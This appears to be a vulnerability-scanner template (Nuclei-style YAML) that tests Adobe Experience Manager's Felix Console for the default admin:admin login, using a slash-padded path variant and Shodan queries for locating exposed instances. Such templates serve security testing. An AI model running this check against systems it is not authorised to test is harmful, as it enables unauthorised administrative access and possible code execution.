mirror of
https://github.com/SleepingBag945/dddd.git
synced 2025-06-10 02:03:07 +00:00
55 lines
1.7 KiB
YAML
55 lines
1.7 KiB
YAML
id: aem-felix-console
|
|
|
|
info:
|
|
name: Adobe Experience Manager Felix Console - Default Login
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: Adobe Experience Manager Felix Console contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. Remote code execution may also be possible via installation of OSGI bundle.
|
|
reference:
|
|
- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
|
|
- https://github.com/0ang3el/aem-rce-bundle
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
|
cvss-score: 8.3
|
|
cwe-id: CWE-522
|
|
metadata:
|
|
max-request: 2
|
|
shodan-query:
|
|
- http.title:"AEM Sign In"
|
|
- http.component:"Adobe Experience Manager"
|
|
tags: default-login,misconfig,aem,adobe
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/system/console/bundles"
|
|
- "{{BaseURL}}///system///console///bundles"
|
|
|
|
headers:
|
|
Authorization: Basic {{base64(username + ':' + password)}}
|
|
attack: pitchfork
|
|
payloads:
|
|
username:
|
|
- admin
|
|
password:
|
|
- admin
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<title>Adobe Experience Manager Web Console - Bundles</title>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a004730450220257951b21ffea54e205cda7777f91079063d023abdbeb0e604283a9754c7c139022100e814c7ecc114292caeba6e33d7b0edbe6ce91f3baeb0deec1b5dd1f16a78fd28:922c64590222798bb761d5b6d8e72950
|